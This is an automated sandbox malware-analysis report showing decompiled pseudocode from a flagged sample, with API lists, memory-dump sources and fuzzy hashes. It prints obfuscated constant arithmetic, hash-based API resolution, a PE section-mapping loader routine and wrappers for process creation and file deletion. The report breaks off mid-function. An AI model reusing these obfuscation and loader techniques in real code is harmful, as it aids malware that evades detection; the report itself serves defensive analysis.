                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E006D07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 006D4FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: dc35befc03082ea648cf0aa4494a33d20af433371597595b82786401f99a50a2
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 3BF037B0C1120CFFEB04DFA4DA4689EBFBAEB40300F20819DE808BB250D3715B509B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E10001620(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _t30;
                                          				signed int _t31;
                                          				void* _t38;
                                          				void* _t49;
                                          				void* _t51;
                                          				intOrPtr _t53;
                                          				signed int _t54;
                                          				intOrPtr _t55;
                                          				long _t56;
                                          				signed int _t58;
                                          				signed int _t59;
                                          				intOrPtr* _t65;
                                          				long _t66;
                                          				intOrPtr _t68;
                                          				void* _t70;
                                          				void* _t72;
                                          				void* _t75;
                                          				long* _t77;
                                          				void* _t78;
                                          
                                          				_t30 = _a16;
                                          				_t55 =  *_t30;
                                          				_t68 =  *((intOrPtr*)(_t30 + 4));
                                          				_t31 =  *(_t55 + 0x14) & 0x0000ffff;
                                          				_v8 = _t68;
                                          				_v12 = 0;
                                          				if(0 >=  *((intOrPtr*)(_t55 + 6))) {
                                          					L15:
                                          					return 1;
                                          				} else {
                                          					_t65 = VirtualAlloc;
                                          					_t7 = _t55 + 0x28; // 0x28
                                          					_t77 = _t7 + _t31;
                                          					do {
                                          						_t56 =  *_t77;
                                          						if(_t56 != 0) {
                                          							if(_a8 < _t77[1] + _t56) {
                                          								SetLastError(0xd);
                                          								goto L17;
                                          							} else {
                                          								_t38 = VirtualAlloc( *((intOrPtr*)(_t77 - 4)) + _t68, _t56, 0x1000, 4); // executed
                                          								if(_t38 == 0) {
                                          									goto L17;
                                          								} else {
                                          									_t66 =  *_t77;
                                          									_t51 =  *((intOrPtr*)(_t77 - 4)) + _t68;
                                          									_t70 = _t77[1] + _a4;
                                          									if(_t66 != 0) {
                                          										_t49 = _t51;
                                          										_t75 = _t70 - _t51;
                                          										do {
                                          											 *_t49 =  *((intOrPtr*)(_t75 + _t49));
                                          											_t49 = _t49 + 1;
                                          											_t66 = _t66 - 1;
                                          										} while (_t66 != 0);
                                          									}
                                          									 *(_t77 - 8) = _t51;
                                          									goto L13;
                                          								}
                                          							}
                                          						} else {
                                          							_t54 =  *(_a12 + 0x38);
                                          							if(_t54 <= 0) {
                                          								goto L14;
                                          							} else {
                                          								_push(4);
                                          								_push(0x1000);
                                          								_push(_t54);
                                          								_push( *((intOrPtr*)(_t77 - 4)) + _t68);
                                          								if( *_t65() == 0) {
                                          									L17:
                                          									return 0;
                                          								} else {
                                          									_t72 =  *((intOrPtr*)(_t77 - 4)) + _v8;
                                          									 *(_t77 - 8) = _t72;
                                          									if(_t54 != 0) {
                                          										_t58 = _t54;
                                          										_t59 = _t58 >> 2;
                                          										memset(_t72 + _t59, memset(_t72, 0, _t59 << 2), (_t58 & 0x00000003) << 0);
                                          										_t78 = _t78 + 0x18;
                                          									}
                                          									L13:
                                          									_t68 = _v8;
                                          									_t65 = VirtualAlloc;
                                          									goto L14;
                                          								}
                                          							}
                                          						}
                                          						goto L18;
                                          						L14:
                                          						_t53 = _v12 + 1;
                                          						_t77 =  &(_t77[0xa]);
                                          						_v12 = _t53;
                                          					} while (_t53 < ( *( *_a16 + 6) & 0x0000ffff));
                                          					goto L15;
                                          				}
                                          				L18:
                                          			}

























                                          APIs
                                          • VirtualAlloc.KERNELBASE(?,00000000,00001000,00000004,00000000,00000000,100013CB), ref: 100016BB
                                          • SetLastError.KERNEL32(0000000D,00000000,00000000,100013CB), ref: 10001718
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: AllocErrorLastVirtual
                                          • String ID:
                                          • API String ID: 497505419-0
                                          • Opcode ID: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                          • Instruction ID: fad9ae3e34d1be210c33c3a39cf181ee10ee9e26815f97c4518dfa0af5a2346d
                                          • Opcode Fuzzy Hash: 499873566bbd645cff9e59e7a492908ec14657ec9cd407e7c376ee034dda42c6
                                          • Instruction Fuzzy Hash: C3318F757002459BEB10CF59DC80B9AF7E5EF88380F298569E948DB349D672EC51CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E006D976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E006D07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(006C591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006C591A), ref: 006D9816
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 3f8e90123bad8e9db8c238fbfb71a36c04cb31a8b2b8d6f9f018623c35058772
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 3011D372900148BBDF599F92DC0ACDF7F3AEF89750F104048FA1456120D2728A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E006CB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E006C602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E006D07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(006D0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,006D0668,?,?,?,?), ref: 006CB5FD
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 4dfd29d2e95c8a81270e188d170eef02627936aac4c261a76deba25f80d2271c
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 8E11C372801248BBDF56DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E006D981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E006D07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006C87F2,0000CAAE,0000510C,AD82F196), ref: 006D989B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: bd96d7fd845bcf9acbec375f88614873cfd5b079acd079bb1ab1d14eab653b18
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: 98019A72801208FBDB04EFD5D846CDFBF79EF85310F10818DF908A6220E6719B219BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E006D7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006C602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E006D07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 006D7C67
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 265b839422b40c41ae9c4a18b9b8809066ca68da7193d2a8cd01760036c7e771
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: BC014FB190120CFFEB49DF94C94A9DE7BB5EF44314F20819DF40567240E6B15F509B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E006CB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E006C602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E006D07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006CB759
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: b12ae957d101f7aa69163a32ec028809930ad8a978d3accd7e31397482b4cded
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: A6014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E209B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E006DAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E006C602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E006D07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 006DAAA8
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 663a755dfc6d45a7fbd065eb061e0d929363b67b5f9ec4174fd994159a9be1ad
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 46F0F6B590020CFFDB08DF94D94A99EBBB5EB45304F10819CF915A6250D2B69B549B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 25%
                                          			E1000745A() {
                                          				void* _t1;
                                          				void* _t2;
                                          				void* _t3;
                                          				void* _t4;
                                          				void* _t7;
                                          
                                          				_push(1);
                                          				_push(0);
                                          				_push(0); // executed
                                          				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
                                          				return _t1;
                                          			}









                                          APIs
                                          • _doexit.LIBCMT ref: 10007460
                                            • Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
                                            • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
                                            • Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
                                            • Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
                                            • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
                                            • Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2097429023.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000007.00000002.2097424498.0000000010000000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                                          • Associated: 00000007.00000002.2097445868.0000000010012000.00000004.00020000.sdmp
                                          • Associated: 00000007.00000002.2097450834.0000000010015000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Pointer$Decode$Encode__initterm$__lock_doexit
                                          • String ID:
                                          • API String ID: 3712619029-0
                                          • Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                          • Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
                                          • Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
                                          • Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 92%
                                          			E006C9FDC(void* __edx) {
                                          				void* __edi;
                                          				signed int _t751;
                                          				void* _t787;
                                          				signed char** _t788;
                                          				signed char** _t790;
                                          				signed char** _t793;
                                          				signed char** _t799;
                                          				short _t803;
                                          				signed int _t804;
                                          				signed int _t805;
                                          				void* _t806;
                                          				signed int _t809;
                                          				signed int _t817;
                                          				signed int _t820;
                                          				signed int _t832;
                                          				signed int _t836;
                                          				signed int _t903;
                                          				intOrPtr* _t917;
                                          				short* _t918;
                                          				short* _t919;
                                          				signed int _t920;
                                          				signed int _t921;
                                          				signed int _t922;
                                          				signed int _t923;
                                          				signed int _t924;
                                          				signed int _t925;
                                          				signed int _t926;
                                          				signed int _t927;
                                          				signed int _t928;
                                          				signed int _t929;
                                          				signed int _t930;
                                          				signed int _t931;
                                          				signed int _t932;
                                          				signed int _t933;
                                          				signed int _t934;
                                          				signed int _t935;
                                          				signed int _t936;
                                          				signed int _t937;
                                          				signed int _t945;
                                          				signed int _t946;
                                          				signed int _t948;
                                          				void* _t949;
                                          				void* _t950;
                                          				void* _t951;
                                          				void* _t954;
                                          				void* _t955;
                                          
                                          				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                          				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
                                          				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                          				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                          				_push(_t917);
                                          				_push( *((intOrPtr*)(_t949 + 0xc84)));
                                          				_push(__edx);
                                          				_push(1);
                                          				E006C602B(1);
                                          				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
                                          				_t950 = _t949 + 0x1c;
                                          				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
                                          				_t946 = 0;
                                          				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
                                          				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
                                          				_t806 = 0x2ca20b85;
                                          				 *(_t950 + 0x9c) = 0xada2;
                                          				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
                                          				_t920 = 0x73;
                                          				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
                                          				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
                                          				 *(_t950 + 0x98) = 0x829e;
                                          				_t921 = 0x5b;
                                          				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
                                          				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
                                          				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
                                          				 *(_t950 + 0x7c) = 0xdccb;
                                          				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
                                          				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
                                          				 *(_t950 + 0xb4) = 0xef7d;
                                          				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
                                          				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
                                          				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
                                          				 *(_t950 + 0xe8) = 0xccb1;
                                          				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
                                          				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
                                          				 *(_t950 + 0x74) = 0xc511;
                                          				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
                                          				_t922 = 0x69;
                                          				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
                                          				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
                                          				 *(_t950 + 0xa4) = 0x943d;
                                          				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
                                          				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
                                          				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
                                          				 *(_t950 + 0x114) = 0x676a;
                                          				_t923 = 0xb;
                                          				 *(_t950 + 0x130) = 0;
                                          				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
                                          				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
                                          				 *(_t950 + 0x4c) = 0x9f6f;
                                          				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
                                          				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
                                          				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
                                          				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
                                          				 *(_t950 + 0x44) = 0xfa80;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
                                          				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
                                          				 *(_t950 + 0xec) = 0x5cda;
                                          				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
                                          				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
                                          				 *(_t950 + 0x2c) = 0x6ba5;
                                          				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
                                          				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
                                          				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
                                          				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
                                          				 *(_t950 + 0xb4) = 0xc1db;
                                          				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
                                          				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
                                          				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
                                          				 *(_t950 + 0xf0) = 0xa853;
                                          				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
                                          				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
                                          				 *(_t950 + 0xe8) = 0x787f;
                                          				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
                                          				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
                                          				 *(_t950 + 0xa8) = 0xf94e;
                                          				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
                                          				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
                                          				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
                                          				 *(_t950 + 0x118) = 0x6b15;
                                          				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
                                          				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
                                          				 *(_t950 + 0x10c) = 0x9660;
                                          				_t804 = 0x3f;
